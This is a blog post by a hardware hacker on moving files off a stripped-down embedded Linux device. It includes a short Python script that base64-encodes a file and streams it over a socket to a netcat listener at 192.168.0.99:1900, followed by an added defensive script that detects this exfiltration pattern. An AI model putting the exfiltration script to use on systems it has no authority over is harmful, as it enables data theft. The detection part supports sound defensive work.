Exfiltration from a stripped down system.


From the "in case I need to do this again" archives

So recently I got access to an embedded Linux system via a soldered-on serial cable, and on this system there were a bunch of compiled Python bytecode files that I really wanted to look at. While the box had network access, there were a couple of hurdles to get over.

  • It was running a really old version of BusyBox that was lacking all of the tools that would make this easy (no netcat, no scp, no ftp client, no tftp client).
  • Very limited space, so statically compiling binaries and attempting to copy them across was going to be touch and go.
  • Nothing on the device would let me do any analysis without first moving the files off the box.

After digging around the only thing I found was python and a handful of libraries, so I knew we were good :)

Given I have no idea whether any of these files have nulls in them, the best bet was to base64 those bad boys and then spit them out onto the wire. That way I don't have to worry about truncated transfers or about filling up the couple of meg of storage I have.

Boom, quick and dirty python 5 liner.

import sys, base64, socket

# read in binary mode so bytecode containing NUL bytes survives untouched
with open(sys.argv[1], 'rb') as f:
    data = f.read()

s = socket.socket()
s.connect(("192.168.0.99", 1900))
# sendall() keeps writing until the whole payload is out; send() may stop short
s.sendall(base64.b64encode(data))
s.close()


Set up your netcat listener on the address and port specified in the script.

nc -l 1900 | base64 -d > somefile


and call your script with the file to send as its first argument.

Robert's a good friend of your aunt.

Yes, yes, as with all my code this can be improved upon, but I think you're missing the point: backed into a corner, quick and dirty.*

I was lucky this time that Python was installed; I'm going to look at other ways to exfil data with naff all tools. If you have any suggestions, drop me a line.
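From the defender's side, a transfer like the one above has a recognisable shape: one outbound TCP connection to an unusual port carrying a single unbroken run of base64 alphabet that decodes to non-text bytes. The following is an added example, not the author's code, that applies that heuristic to a handful of constructed flow records. The record format, the port allowlist and the thresholds are assumptions chosen for the demo; base64-encoded text (MIME bodies, Basic-auth headers) is deliberately left alone so the check does not fire on ordinary mail or web traffic.

```python
import base64
import binascii
import math
import re

# Constructed flow records for the demo, not real captures:
# (src_ip, dst_ip, dst_port, first bytes of the payload)
CONSTRUCTED_BINARY = b"\x03\xf3\r\n" + bytes(range(256))  # stand-in for a compiled file
SAMPLE_FLOWS = [
    ("10.0.0.7", "192.168.0.99", 1900, base64.b64encode(CONSTRUCTED_BINARY)),
    ("10.0.0.7", "10.0.0.1", 80, b"GET /index.html HTTP/1.0\r\nHost: 10.0.0.1\r\n\r\n"),
    ("10.0.0.7", "10.0.0.2", 8080, base64.b64encode(b"user:pass")),      # short token
    ("10.0.0.7", "10.0.0.3", 25, base64.b64encode(b"Meeting notes: " * 20)),  # MIME-style text
]

BASE64_RE = re.compile(rb"[A-Za-z0-9+/]+={0,2}")
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def shannon_entropy(data):
    """Bits per byte: close to 8.0 for compressed/random data, lower for text."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def printable_ratio(data):
    """Fraction of bytes that are printable ASCII or whitespace."""
    if not data:
        return 1.0
    return sum(1 for b in data if b in PRINTABLE) / len(data)


def looks_like_base64_blob(payload, min_len=64):
    """True when the payload is one unbroken base64 token that decodes to binary.

    Short tokens and tokens that decode to mostly printable text are not
    flagged; the thresholds are assumptions, tune them against real traffic.
    """
    token = payload.strip()
    if len(token) < min_len or len(token) % 4 != 0:
        return False
    if not BASE64_RE.fullmatch(token):
        return False
    try:
        decoded = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return False
    return printable_ratio(decoded) < 0.7 and shannon_entropy(decoded) > 6.0


def suspicious_flows(flows, allowed_ports=frozenset({80, 443, 53})):
    """Return (src, dst, port, reason) for flows that match the exfil shape."""
    findings = []
    for src, dst, port, payload in flows:
        if port in allowed_ports:
            continue  # assumption: traffic on these ports is inspected elsewhere
        if looks_like_base64_blob(payload):
            findings.append((src, dst, port,
                             "base64 blob decoding to non-text bytes on port %d" % port))
    return findings


if __name__ == "__main__":
    for finding in suspicious_flows(SAMPLE_FLOWS):
        print("ALERT %s -> %s:%d  %s" % finding)
```

Run against the constructed records, only the first flow is reported: the HTTP request is on an allowlisted port and is not base64 anyway, the Basic-auth token is far below the length threshold, and the mail body decodes to plain text. Feeding real flow data through this means replacing `SAMPLE_FLOWS` with whatever your capture or proxy logs expose as (source, destination, port, payload) tuples.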




* Coincidentally this just how your mum likes it.**

** Sorry***

*** Possibly a lie